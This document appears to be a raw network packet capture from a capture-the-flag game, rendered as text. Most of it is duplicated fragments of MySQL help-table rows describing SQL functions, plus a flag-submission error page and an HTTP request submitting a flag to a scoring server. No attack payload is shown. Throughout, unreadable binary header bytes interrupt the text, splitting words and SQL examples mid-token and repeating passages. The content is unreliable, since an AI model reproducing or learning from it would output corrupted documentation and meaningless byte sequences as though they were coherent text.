BINARY\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as voweCB bb0`BiET@/Ԁo0SE SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as voweC bbBi0`ET@/p܂Ao0E SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nC bb0`BiET@/Ԁo0SE SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nC bbBi0`ET@/p܂Ao0E SPAM Museum Administrator Interface
C bb0`BiET@/Ԁo0SE SPAM Museum Administrator Interface
Cc ZZBi0`EL@/܂Sŀo0E4@? 3 PbҀ)H )SC~ ZZ0`BiEL@/go0AE4@@ 3 PbҀ)H )SC\ ZZBi0`EL@/܂Sŀo0E4@? 3 Pb)> )TCu ZZ0`BiEL@/go0AE4@@ 3 Pb)> )TC0 bbBi0`ET@/p܂Ao0E SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348CK bb0`BiET@/Ԁo0SE SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348C kkBiʪE]@/o0oo0EE`@@P 3Pң\ 7=x(HTTP/1.0 200 OK Cǟ kk0`BiE]@/ˀo0SEE`@@P 3Pң\ 7=x(HTTP/1.0 200 OK C bbBi0`ET@/p܂Ao0E SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n C bb0`BiET@/Ԁo0SE SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n C BiʪE@/ۀo0oo0Epb@@M 3PҤ\ 7=x(Content-Type: text/html CTF Flag Submission

Error submitting flag

The service you submitted a flag for is maxed out.You will not be awarded any more points for hacking this service.Try to hack another service.


Try again, enter your flag here:

Cɣ 0`BiE@/o0SEpb@@M 3PҤ\ 7=x(Content-Type: text/html CTF Flag Submission

Error submitting flag

The service you submitted a flag for is maxed out.You will not be awarded any more points for hacking this service.Try to hack another service.


Try again, enter your flag here:

C ZZBi0`EL@/܂Sŀo0E4@? 3 Pb)4~ )TC ZZ0`BiEL@/go0AE4@@ 3 Pb)4~ )TCv bbBi0`ET@/p܂Ao0E 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries tC bb0`BiET@/Ԁo0SE 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries tCj ZZBi0`EL@/܂Sŀo0E4?@? 3 :PM ׀c )Uy4C ZZ0`BiEL@/Eo0lE4?@@ 3 :PM ׀c )Uy4C] bbBi0`ET@/p܂Ao0E  )Chat has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-createCg NNBi0`E@@/Jƒxǀo0E(@  P*!\yP(C bb0`BiET@/Ԁo0SE  )Chat has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-createC NNʪBiE@@/#o0o0oE(@@  P*!\yP(Cܬ ZZBi0`EL@/$T<o0E4@?I  PΥPK@TB ^ݧ7=wC ZZʪBiEL@/o0o0oE4@@H  PΥPK@TB ^ݧ7=wC° bbBi0`ET@/p܂Ao0E SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| Cܰ bb0`BiET@/Ԁo0SE SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| C9 ~~Bi0`Ep@/uGo0EXQ@  >E<B@?j  P;@  ^ѹCC ~~Bi0`Ep@/uGo0EX@Z  E<<@?$  P- ]CJ ~~Bi0`Ep@/uGo0EX#@  EE<@?~  PTK T_Ca ~~0`BiEp@/0o0<EXQ@  >E<B@?j  P;@  ^ѹCt ~~0`BiEp@/o0AEX@Z  E<<@?$  P- ]C ~~0`BiEp@/ o09dEX#@  EE<@?~  PTK T_C Bi0`E@/#<o0E@?I#  PΥPK@` ^ݨ7=wGET /cgi-bin/submitflag.py/?flag=MTNzExIDAD3YKPZRnNYmV6bZmnIkWkwkVGGEVw==& HTTP/1.1 Connection: close Host: 10.0.0.10 User-Agent: Mozilla/5.0 C ʪBiE@/o0o0oE@@H#  PΥPK@` ^ݨ7=wGET /cgi-bin/submitflag.py/?flag=MTNzExIDAD3YKPZRnNYmV6bZmnIkWkwkVGGEVw==& HTTP/1.1 Connection: close Host: 10.0.0.10 User-Agent: Mozilla/5.0 C- ZZBiʪEL@/o0oo0E43@@ P߮PK@Υc$ 7=x^ݨCE ZZ0`BiEL@/To0<E43@@ P߮PK@Υc$ 7=x^ݨC bbBi0`ET@/p܂Ao0E USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE dC ZZBi0`EL@/܂Sŀo0E4?@? 3 :PM ؀c )Vy7C* bb0`BiET@/Ԁo0SE<7@@K@  3PX&tڀ  )Decify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the directory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE dC; ZZ0`BiEL@/Eo0lE4?@@ 3 :PM ؀c )Vy7C ZZBi0`EL@/܂Sŀo0E4@? 3 Pb")G )VC ZZ0`BiEL@/go0AE4@@ 3 Pb")G )VCl bbBi0`ET@/p܂Ao0E<8@?L?  3PX+tڀ B )Db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value usiC bb0`BiET@/Ԁo0SE<8@@K?  3PX+tڀ B )Db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value usiC bbBi0`ET@/p܂Ao0E SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the C bb0`BiET@/Ԁo0SE SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the C5 bbBi0`ET@/p܂Ao0E SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,' Intersects(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially intersects\ng2.\n','',''),(267,'MBRDISJOINT',8,' MBRDisjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n','',''),(268,'SUBSTRING_INDEX',23,' SUBSTRING_INDEX(str,delim,count)\nReturns the substring from string str before count\noccurrences of the delimiter delim.\nIf count is positive, everything to the left of the final delimiter\n(counting from the left) is returned.\nIf count is negative, everything to the right of the final delimiter\n(counting from the right) is returned.\n','C? ZZBi0`EL@/Ao0E4z@?  P|yX\ * n^CX bb0`BiET@/Ԁo0SE SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,' Intersects(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially intersects\ng2.\n','',''),(267,'MBRDISJOINT',8,' MBRDisjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n','',''),(268,'SUBSTRING_INDEX',23,' SUBSTRING_INDEX(str,delim,count)\nReturns the substring from string str before count\noccurrences of the delimiter delim.\nIf count is positive, everything to the left of the final delimiter\n(counting from the left) is returned.\nIf count is negative, everything to the right of the final delimiter\n(counting from the right) is returned.\n','Cj ZZ0`BiEL@/To0<E4z@@  P|yX\ * n^C ZZBi0`EL@/Ao0E4@?  ֞Pg%"l h dmMC ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"l h dmMC# ZZBi0`EL@/܂Sŀo0E4@? 3 Pb2) 5 )WC< ZZ0`BiEL@/go0AE4@@ 3 Pb2) 5 )WC ZZBi0`EL@/܂Sŀo0E4@? 3 PbB)% )WC ZZ0`BiEL@/go0AE4@@ 3 PbB)% )WCc bbBi0`ET@/p܂Ao0E )Fmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decimals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (make zero) D digits left of the\ndecimal point of the value X.\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThCl ZZBi0`EL@/Ao0E4@?  ֞Pg%"lS dmPC bb0`BiET@/Ԁo0SE )Fmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decimals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (make zero) D digits left of the\ndecimal point of the value X.\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThC ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"lS dmPC bbBi0`ET@/p܂Ao0Eo0xE4@@% Pٮ4tupC% ZZBi0`EL@/܂Sŀo0E4@? 3 Pb"R) )XC= ZZ0`BiEL@/go0AE4@@ 3 Pb"R) )XC bbBi0`ET@/p܂Ao0E SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n','',''),(275,'SECOND',14,' SECOND(time)\nReturns the second for time, in the range 0 to 59.\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculatingC- bb0`BiET@/Ԁo0SE SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n','',''),(275,'SECOND',14,' SECOND(time)\nReturns the second for time, in the range 0 to 59.\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculatingC Bi0`E@/va C 0`BiE@/o0AE@@k  PoK# ŀ 8 qc[87
C bbBi0`ET@/p܂Ao0E SELECT ATAN(-2,2);\n -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+----------------------+\n| MBRContains(@g1,@g2) | MBRContains(@g2,@g1) |\n+----------------------+----------------------+\n| 1 | 0 |\n+----------------------+----------------------+',''),(279,'HOUR',14,' HOUR(time)\nReturns the hour for time. The range of the return value is\n0 to 23 for time-of-day values.\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internaC bb0`BiET@/Ԁo0SE SELECT ATAN(-2,2);\n -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT 